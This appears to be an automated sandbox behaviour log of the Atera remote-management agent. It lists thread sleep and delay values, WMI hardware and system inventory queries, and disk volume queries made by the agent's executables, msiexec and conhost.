Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -594796s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -594687s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -594577s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageSTRemote\AgentPackageSTRemote.exe TID: 3332	Thread sleep time: -594468s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7332	Thread sleep count: 2866 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7464	Thread sleep count: 2721 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7344	Thread sleep time: -16602069666338586s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7344	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7524	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 5948	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6692	Thread sleep count: 4715 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6692	Thread sleep count: 2496 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6708	Thread sleep time: -20291418481080494s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6708	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6732	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 6508	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7644	Thread sleep count: 1002 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7644	Thread sleep count: 739 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 1168	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe TID: 7580	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 7688	Thread sleep time: -60000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 7932	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 7896	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageUpgradeAgent\AgentPackageUpgradeAgent.exe TID: 1804	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7500	Thread sleep count: 6741 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep count: 42 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -38738162554790034s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -600000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -599813s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -599688s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -599553s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -599416s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -599306s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7500	Thread sleep count: 3048 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -599188s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -599078s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -598966s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -598860s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -598739s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -598610s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -598485s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -598360s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -598235s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -598110s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -597985s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -597860s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -597735s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -597621s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -597500s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -597391s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -597266s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -597141s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -597030s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -596922s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -596791s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -596681s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -596573s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -596464s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -596346s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -596219s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -596105s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -595957s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -595828s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -595699s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -595578s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -595450s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -595321s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -595203s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -595094s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -594983s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -594868s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -594750s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -594630s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -594500s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -594391s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -594282s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -594157s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -594032s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -593907s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageTicketing\AgentPackageTicketing.exe TID: 7520	Thread sleep time: -593782s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 4828	Thread sleep count: 2854 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 4828	Thread sleep count: 6883 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7252	Thread sleep time: -17524406870024063s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe TID: 7252	Thread sleep time: -30000s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 4488	Thread sleep count: 33 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 4488	Thread sleep time: -30437127721620741s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 5608	Thread sleep count: 5675 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageProgramManagement\AgentPackageProgramManagement.exe TID: 5608	Thread sleep count: 4137 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe TID: 7468	Thread sleep time: -14757395258967632s >= -30000s
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe TID: 7308	Thread sleep count: 4126 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe TID: 7308	Thread sleep count: 1531 > 30
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageHeartbeat\AgentPackageHeartbeat.exe TID: 1700	Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\SysWOW64\rundll32.exe TID: 1520	Thread sleep time: -30000s >= -30000s

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe

File opened: PhysicalDrive0

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Manufacturer,SoftwareElementID,ReleaseDate from Win32_BIOS
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_BIOS
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\CIMV2 : select Manufacturer,SoftwareElementID,ReleaseDate from Win32_BIOS
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select Manufacturer,Model,Product from Win32_BaseBoard

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PartOfDomain,Workgroup,Domain FROM Win32_ComputerSystem
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select PartOfDomain,Workgroup,Domain FROM Win32_ComputerSystem
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from Win32_ComputerSystem
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select Name from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Processor
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : select MaxClockSpeed from Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	File Volume queried: C:\ FullSizeInformation
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageMonitoring\AgentPackageMonitoring.exe	File Volume queried: C:\ FullSizeInformation

Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 90000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 30000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\AteraAgent.exe	Thread delayed: delay time: 90000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 922337203685477
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 600000
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599875
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599765
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599656
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599547
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599437
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599328
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599218
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 599109
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598986
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598873
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598765
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598650
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598547
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598437
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598325
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598218
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 598109
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597999
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597890
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597781
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597671
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597562
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597453
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597343
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597234
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597125
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 597015
Source: C:\Program Files (x86)\ATERA Networks\AteraAgent\Packages\AgentPackageAgentInformation\AgentPackageAgentInformation.exe	Thread delayed: delay time: 596905
